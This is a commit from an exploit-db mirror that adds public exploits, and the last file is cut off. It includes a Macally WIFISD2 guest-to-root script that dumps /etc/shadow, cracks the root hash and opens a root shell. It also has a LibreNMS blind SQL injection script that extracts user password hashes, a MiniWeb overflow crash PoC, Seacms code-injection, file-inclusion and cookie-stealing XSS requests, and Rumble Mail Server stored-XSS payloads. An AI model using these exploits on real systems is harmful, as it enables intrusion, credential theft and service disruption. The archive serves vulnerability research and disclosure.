bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-12-15

Browse source 
13 changes to exploits/shellcodes

System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)
LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection
MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
Seacms 11.1 - 'ip and weburl' Remote Command Execution
Seacms 11.1 - 'file' Local File Inclusion
Seacms 11.1 - 'checkuser' Stored XSS
WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download
Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS
Rumble Mail Server 0.51.3135 - 'username' Stored XSS
Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
Gitlab 11.4.7 - Remote Code Execution
This commit is contained in:
Offensive Security 2020-12-15 05:02:04 +00:00
parent fc0129fabf
commit d7c025fc8d
14 changed files with 1039 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

140
exploits/hardware/webapps/49256.py Executable file
View file

@ -0,0 +1,140 @@
# Exploit Title: Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
# Date: 03.12.2020
# Exploit Author: Maximilian Barz and Daniel Schwendner
# Vendor Homepage: https://us.macally.com/products/wifisd2
# Version: 2.000.010
# Tested on: Kali Linux 5.7.0-kali1-amd64
# CVE : CVE-2020-29669
# Reference: https://github.com/S1lkys/CVE-2020-29669/
#!/usr/bin/env/python3
import requests
import telnetlib
import os
import sys
import re
banner = '''\033[94m
\x1b[0m
Macally WIFISD2 Guest to Root Privilege Escalation for CVE-2020-29669 by Maximilian Barz and Daniel Schwendner
'''
def main():
if(len(sys.argv) < 2):
print(banner)
print("Usage: %s <host> " % sys.argv[0])
print("Eg: %s 1.2.3.4 " % sys.argv[0])
return
rhost = sys.argv[1]
session = requests.Session()
guest_creds = "guest_pass"
admin_pass_to_set = "Silky123"
def send_requests():
url = "http://"+rhost+"/protocol.csp?function=set"
payload = {'fname':'security','opt':'pwdchk','name':'guest','pwd1':guest_creds,'function':'set'}
headers = {
'Host': rhost,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://'+rhost+'/index.html',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '65',
'Connection': 'close',
'Cache-Control': 'no-cache',
}
r= session.post(url, payload, headers)
if (b"<errno>0</errno>" in r.content):
print("\033[92m[+] Authentication successful\x1b[0m")
print("\t"+str(session.cookies.get_dict()))
else:
print("\033[91m[+] Authentication failed.\x1b[0m")
sys.exit()
url = "http://"+rhost+"/protocol.csp?fname=security&function=set"
payload = {'name':'admin','opt':'pwdmod','pwd1':admin_pass_to_set,'pwd2':admin_pass_to_set}
headers = {
'Host': rhost,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://'+rhost+'/app/user/guest.html',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '49',
'Connection': 'close',
'Cache-Control': 'no-cache',
}
d = session.post(url, payload, headers)
if (b"<errno>0</errno>" in d.content):
print("\033[92m[+] Admin Password changed to: "+admin_pass_to_set+"\x1b[0m")
telnet_grep_root_hash()
#print("[+] Spawning Admin Shell")
#telnet_login()
else:
print("\033[91m[+] Admin Password change failed\x1b[0m")
sys.exit()
def telnet_grep_root_hash():
user = "admin"
tn = telnetlib.Telnet(rhost)
tn.read_until(b"login: ")
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"Password: ")
tn.write(admin_pass_to_set.encode('ascii') + b"\n")
print("\033[92m[+] Dumping Hashes:\x1b[0m")
tn.write(b"cat /etc/shadow\n\r")
tn.write(b"exit\n")
output = tn.read_all().decode('ascii')
L = output.split('\n')
for hash in L:
if ":" in hash:
print("\t"+hash)
print("\n\r")
for hash in L:
if "root" in hash:
print("\033[92m[+] Root Hash found, trying to crack it..\x1b[0m")
print("\t"+hash) #root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::
f = open("root_hash","w+")
f.write(hash)
f.close()
crack_root_hash();
def crack_root_hash():
f = open("root_hash", "r")
hash = f.read()
if ("root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::" in hash):
print("\033[92mRoot Password: 20080826\x1b[0m\n")
telnet_login()
else:
os.system("hashcat -a 0 -m 500 root_hash /root/tools/routersploit/routersploit/resources/wordlists/passwords.txt") #https://github.com/threat9/routersploit/blob/master/routersploit/resources/wordlists/passwords.txt
def telnet_login():
print("\033[92m[+] Spawning Rootshell\x1b[0m")
user = "root"
root_password="20080826"
tn = telnetlib.Telnet(rhost)
tn.read_until(b"login: ")
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"Password: ")
tn.write(root_password.encode('ascii') + b"\n")
tn.interact()
print(banner)
send_requests()
if(__name__ == '__main__'):
main()

263
exploits/multiple/webapps/49246.py Executable file
View file

@ -0,0 +1,263 @@
# Exploit Title: LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection
# Google Dork: Unknown
# Date: 13-12-2020
# Exploit Author: Hodorsec
# Vendor Homepage: https://www.librenms.org
# Software Link: https://github.com/librenms/librenms
# Update notice: https://community.librenms.org/t/v1-69-october-2020-info/13838
# Version: 1.46
# Tested on: Debian 10, PHP 7, LibreNMS 1.46; although newer version might be affected until 1.69 patch
# CVE : N/A
#!/usr/bin/python3
# EXAMPLE:
# $ python3 poc_librenms-1.46_auth_sqli_timed.py librenms D32fwefwef http://192.168.252.14 2
# [*] Checking if authentication for page is required...
# [*] Visiting page to retrieve initial token and cookies...
# [*] Retrieving authenticated cookie...
# [*] Printing number of rows in table...
# 1
# [*] Found 1 rows of data in table 'users'
#
# [*] Retrieving 1 rows of data using 'username' as column and 'users' as table...
# [*] Extracting strings from row 1...
# librenms
# [*] Retrieved value 'librenKs' for column 'username' in row 1
# [*] Retrieving 1 rows of data using 'password' as column and 'users' as table...
# [*] Extracting strings from row 1...
# $2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr
# [*] Retrieved value '$2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr' for column 'password' in row 1
#
# [+] Done!
import requests
import urllib3
import os
import sys
import re
from bs4 import BeautifulSoup
# Optionally, use a proxy
# proxy = "http://<user>:<pass>@<proxy>:<port>"
proxy = ""
os.environ['http_proxy'] = proxy
os.environ['HTTP_PROXY'] = proxy
os.environ['https_proxy'] = proxy
os.environ['HTTPS_PROXY'] = proxy
# Disable cert warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Set timeout
timeout = 10
# Injection prefix and suffix
inj_prefix = "(select(sleep("
inj_suffix = ")))))"
# Decimal begin and end
dec_begin = 48
dec_end = 57
# ASCII char begin and end
ascii_begin = 32
ascii_end = 126
# Handle CTRL-C
def keyboard_interrupt():
"""Handles keyboardinterrupt exceptions"""
print("\n\n[*] User requested an interrupt, exiting...")
exit(0)
# Custom headers
def http_headers():
headers = {
'User-Agent': 'Mozilla',
}
return headers
def check_auth(url,headers):
print("[*] Checking if authentication for page is required...")
target = url + "/graph.php"
r = requests.get(target,headers=headers,timeout=timeout,verify=False)
if "Unauthorized" in r.text:
return True
else:
return False
def get_initial_token_and_cookies(url,headers):
print("[*] Visiting page to retrieve initial token and cookies...")
target = url + "/login"
r = requests.get(target,headers=headers,timeout=timeout,verify=False)
soup = BeautifulSoup(r.text,'html.parser')
for n in soup('input'):
if n['name'] == "_token":
token = n['value']
return token,r.cookies
else:
return None,r.cookies
def get_valid_cookie(url,headers,token,cookies,usern,passw):
print("[*] Retrieving authenticated cookie...")
appl_cookie = "laravel_session"
post_data = {'_token':token,
'username':usern,
'password':passw,
'submit':''}
target = url + "/login"
r = requests.post(target,data=post_data,headers=headers,cookies=cookies,timeout=timeout,verify=False)
res = r.text
if "Overview | LibreNMS" in res:
return r.cookies
else:
print("[!] No valid response from used session, exiting!\n")
exit(-1)
# Perform the SQLi call for injection
def sqli(url,headers,cookies,inj_str,sleep):
comment_inj_str = re.sub(" ","/**/",inj_str)
inj_params = {'id':'1',
'stat':'none',
'type':'port_mac_acc_total',
'sort':comment_inj_str,
'debug':'1'}
inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_params.items())
# Do GET request
r = requests.get(url,params=inj_params_unencoded,headers=headers,cookies=cookies,timeout=timeout,verify=False)
res = r.elapsed.total_seconds()
if res >= sleep:
return True
elif res < sleep:
return False
else:
print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
exit(-1)
# Extract rows
def get_rows(url,headers,cookies,table,sleep):
rows = ""
max_pos_rows = 4
# Get number maximum positional characters of rows: e.g. 1096,2122,1234,etc.
for pos in range(1,max_pos_rows+1):
# Test if current pos does have any valid value. If not, break
direction = ">"
inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))" + direction + "1,0," + str(sleep) + inj_suffix
if not sqli(url,headers,cookies,inj_str,sleep):
break
# Loop decimals
direction = "="
for num_rows in range(dec_begin,dec_end+1):
row_char = chr(num_rows)
inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))"=+ direction + str(num_rows) + ",0," + str(sleep) + inj_suffix
if sqli(url,headers,cookies,inj_str,sleep):
rows += row_char
print(row_char,end='',flush=True)
break
if rows != "":
print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n")
return int(rows)
else:
return False
# Loop through positions and characters
def get_data(url,headers,cookies,row,column,table,sleep):
extracted = ""
max_pos_len = 50
# Loop through length of string
# Not very efficient, should use a guessing algorithm
print("[*] Extracting strings from row " + str(row+1) + "...")
for pos in range(1,max_pos_len):
# Test if current pos does have any valid value. If not, break
direction = ">"
inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) += ",1)," + str(pos) + ",1))" + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix
if not sqli(url,headers,cookies,inj_str,sleep):
break
# Loop through ASCII printable characters
direction = "="
for guess in range(ascii_begin,ascii_end+1):
extracted_char = chr(guess)
inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix
if sqli(url,headers,cookies,inj_str,sleep):
extracted += chr(guess)
print(extracted_char,end='',flush=True)
break
return extracted
# Main
def main(argv):
if len(sys.argv) == 5:
usern = sys.argv[1]
passw = sys.argv[2]
url = sys.argv[3]
sleep = int(sys.argv[4])
else:
print("[*] Usage: " + sys.argv[0] + " <username> <password> <url> <sleep_in_seconds>\n")
exit(0)
# Random headers
headers = http_headers()
# Do stuff
try:
# Get a valid initial token and cookies
token,cookies = get_initial_token_and_cookies(url,headers)
# Check if authentication is required
auth_required = check_auth(url,headers)
if auth_required:
# Get an authenticated session cookie using credentials
valid_cookies = get_valid_cookie(url,headers,token,cookies,usern,passw)
else:
valid_cookies = cookies
print("[+] Authentication not required, continue without authentication...")
# Setting the correct vulnerable page
url = url + "/graph.php"
# The columns to retrieve
columns = ['username','password']
# The table to retrieve data from
table = "users"
# Getting rows
print("[*] Printing number of rows in table...")
rows = get_rows(url,headers,valid_cookies,table,sleep)
if not rows:
print("[!] Unable to retrieve rows, checks requests.\n")
exit(-1)
# Getting values for found rows in specified columns
for column in columns:
print("[*] Retrieving " + str(rows) + " rows of data using '" + column + "' as column and '" + table + "' as table...")
for row in range(0,rows):
# rowval_len = get_length(url,headers,row,column,table)
retrieved = get_data(url,headers,valid_cookies,row,column,table,sleep)
print("\n[*] Retrieved value '" + retrieved + "' for column'" + column + "' in row " + str(row+1))
# Done
print("\n[+] Done!\n")
except requests.exceptions.Timeout:
print("[!] Timeout error\n")
exit(-1)
except requests.exceptions.TooManyRedirects:
print("[!] Too many redirects\n")
exit(-1)
except requests.exceptions.ConnectionError:
print("[!] Not able to connect to URL\n")
exit(-1)
except requests.exceptions.RequestException as e:
print("[!] " + str(e))
exit(-1)
except requests.exceptions.HTTPError as e:
print("[!] Failed with error code - " + str(e.code) + "\n")
exit(-1)
except KeyboardInterrupt:
keyboard_interrupt()
exit(-1)
# If we were called as a program, go execute the main function.
if __name__ == "__main__":
main(sys.argv[1:])

55
exploits/multiple/webapps/49247.py Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
# Date: 13.12.2020
# Exploit Author: securityforeveryone.com
# Author Mail: hello[AT]securityforeveryone.com
# Vendor Homepage: https://sourceforge.net/projects/miniweb/
# Software Link: https://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download
# Version: 0.8.19
# Tested on: Win7 x86
# Researchers: Security For Everyone Team - https://securityforeveryone.com
'''
Description
MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the
first parameter in a POST request.
Exploitation
The vulnerability is the first parameter's name of the POST request. Example: PARAM_NAME1=param_data1&param_name2=param_data2
if we send a lot of "A" characters to "PARAM_NAME1", the miniweb server will crash.
About Security For Everyone Team
We are a team that has been working on cyber security in the industry for a long time.
In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
We have many free tools that you can use here: https://securityforeveryone.com/free-tool-list
'''
#!/usr/bin/python
import socket
import sys
import struct
if len(sys.argv) != 2 :
print "[+] Usage : python exploit.py [VICTIM_IP]"
exit(0)
TCP_IP = sys.argv[1]
TCP_PORT = 8000
xx = "A"*2038 #4085
http_req = "POST /index.html HTTP/1.1\r\n"
http_req += "Host: 192.168.231.140\r\n"
http_req += "From: header-data\r\n"
http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
http_req += xx + "=param_data1&param_name2=param_data2"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
print "[+] Sending exploit payload..."
s.send(http_req)
s.close()

29
exploits/multiple/webapps/49249.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Seacms 11.1 - 'ip and weburl' Remote Command Execution
# Date: 20201212
# Exploit Author: j5s
# Vendor Homepage: https://www.seacms.net/
# Software Link: https://www.seacms.net/
# Version: 11.1
POST /SeaCMS111/5f9js3/admin_ip.php?action=set HTTP/1.1
Host: 192.168.137.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://192.168.137.139
Connection: close
Referer: http://192.168.137.139/SeaCMS111/5f9js3/admin_ip.php
Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
t00ls=e54285de394c4207cd521213cebab040;
t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
Upgrade-Insecure-Requests: 1
v=0&ip=+%22%3Bphpinfo%28%29%3B%2F%2F
Vulnerable parametersip
payload";phpinfo();//

24
exploits/multiple/webapps/49250.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: Seacms 11.1 - 'file' Local File Inclusion
# Date: 20201212
# Exploit Author: j5s
# Vendor Homepage: https://www.seacms.net/
# Software Link: https://www.seacms.net/
# Version: 11.1
GET /SEACMS111/5f9js3/admin_safe.php?action=download&file=C:/windows/system.ini HTTP/1.1
Host: 192.168.137.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=scan
Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
t00ls=e54285de394c4207cd521213cebab040;
t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
Upgrade-Insecure-Requests: 1
Vulnerable parameters file
payloadC:/windows/system.ini

30
exploits/multiple/webapps/49251.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Seacms 11.1 - 'checkuser' Stored XSS
# Date: 20201212
# Exploit Author: j5s
# Vendor Homepage: https://www.seacms.net/
# Software Link: https://www.seacms.net/
# Version: 11.1
POST /SEACMS111/5f9js3/admin_safe.php?action=setting HTTP/1.1
Host: 192.168.137.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://192.168.137.139
Connection: close
Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=setting
Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
t00ls=e54285de394c4207cd521213cebab040;
t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MDoiIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
Upgrade-Insecure-Requests: 1
checkuser=%22%3E%3CsCrIpT%3Ealert%281%29%3C%2FsCrIpT%3E&checkhta=on&btnsetting=%E6%8F%90%E4%BA%A4
Vulnerable parameters checkuser
payload"><ScRiPt>alert(document.cookie)</ScRiPt>

36
exploits/multiple/webapps/49252.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download
# Google Dork: intitle:("Index of" AND "wp-content/plugins/boldgrid-backup/=")
# Date: 2020-12-12
# Exploit Author: Wadeek
# Vendor Homepage: https://www.boldgrid.com/
# Software Link: https://downloads.wordpress.org/plugin/boldgrid-backup.1.14.9.zip
# Version: 1.14.9
# Tested on: BackBox Linux
1) 'readme.txt' file reveal the plugin version :
-> GET /wp-content/plugins/boldgrid-backup/readme.txt
Stable tag: 1.14.9
2) 'env-info.php' file reveals the following informations without authentication :
-> GET /wp-content/plugins/boldgrid-backup/cli/env-info.php
{
[...],
"php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x=
86_64",
"php_version":"7.X.X",
"server_addr":"127.0.0.1",
"server_name":"www.example.com",
"server_protocol":"HTTP/1.1",
"server_software":"Apache/2.X.XX (Ubuntu)",
"uid":XX,
"username":"www-data"
}
3) 'restore-info.json' file reveals the name and location of the archive containing the backups without authentication :
-> GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json
{
[...]
"filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip"
[...]
}
--trekuen-71b82944-04b2-40f7-b2e2-d8de1b7f2bb8--

75
exploits/multiple/webapps/49253.txt Normal file
View file

@ -0,0 +1,75 @@
# Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
# Date: 2020-9-3
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://rumble.sf.net/
# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
# Version: Version 0.51.3135
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
# Exploit:
POST /settings:save HTTP/1.1
Host: 127.0.0.1:2580
Connection: keep-alive
Content-Length: 343
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:2580
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:2580/settings
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings
HTTP/1.1 302 Moved
Location: /settings:save
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico " />
<title>RumbleLua</title>
<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div class="header_top">
<div class="header_stuff">
RumbleLua on <script>alert(xss.com)</script><br />
<span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
</span>
<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
</div>
</div>
<div id="contents">
<h1>Server settings</h1>
Saving config/rumble.conf
</div>
<br />
<p align="center">
Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
</p>
</body>
</html>

105
exploits/multiple/webapps/49254.txt Normal file
View file

@ -0,0 +1,105 @@
# Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS
# Date: 2020-9-3
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://rumble.sf.net/
# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
# Version: Version 0.51.3135
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
# Info
The parameters `domain` and `path` are vulnerable to stored XSS.
# Exploit:
POST /domains HTTP/1.1
Host: 127.0.0.1:2580
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Origin: http://127.0.0.1:2580
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert(
Upgrade-Insecure-Requests: 1
domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico " />
<title>RumbleLua</title>
<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div class="header_top">
<div class="header_stuff">
RumbleLua on a<br />
<span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
</span>
<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
</div>
</div>
<div id="contents">
<h2>Domains</h2>
<p>
<table class="elements" border='0' cellpadding='5' cellspacing='1'><tr><th>Create a new domain</th></tr><tr><td><b><font color='darkgreen'>Domain <script>alert("XSS")</script> has been created.</font></b></td></tr><tr><td> <form action="/domains" method="post" id='create'>
<div>
<div >
<div class='form_key'>
Domain name:
</div>
<div class='form_value'>
<input type="text" name="domain"/>
</div>
</div>
<div>
<div class='form_key'>
Optional alt. storage path:
</div>
<div class='form_value'>
<input type="text" name="path"/>
</div>
</div>
<div class='form_el' id='domainsave' >
<div class='form_key'>
<input type="hidden" name="create" value="true"/>
<input class="button" type="submit" value="Save domain"/>
<input class="button" type="reset" value="Reset"/>
</div>
</div>
<br/><br/><br/><br/><br />
</div>
</form>
</td></tr></table></p>
<p>&nbsp;</p>
<table class="elements" border='0' cellpadding='5' cellspacing='1'>
<tr><th>Domain</th><th>Actions</th></tr>
<tr><td><img src='/icons/house.png' align='absmiddle'/>&nbsp;<a href='/accounts:<script>alert("XSS")</script>'><strong><script>alert("XSS")</script></strong></a></td><td><a href="/domains:<script>alert("XSS")</script>"><img title='Edit domain' src='/icons/report_edit.png' align='absmiddle'/></a> <a href="/domains?domain=<script>alert("XSS")</script>&delete=true"><img title='Delete domain' src='/icons/delete.png' align='absmiddle'/></a></td></tr></table>
</div>
<br />
<p align="center">
Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
</p>
</body>
</html>

146
exploits/multiple/webapps/49255.txt Normal file
View file

@ -0,0 +1,146 @@
# Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS
# Date: 2020-9-3
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://rumble.sf.net/
# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
# Version: Version 0.51.3135
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
# Exploit:
POST /users HTTP/1.1
Host: 127.0.0.1:2580
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
Origin: http://127.0.0.1:2580
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://127.0.0.1:2580/users
Upgrade-Insecure-Requests: 1
username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico " />
<title>RumbleLua</title>
<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div class="header_top">
<div class="header_stuff">
RumbleLua on a.com<br />
<span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
</span>
<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
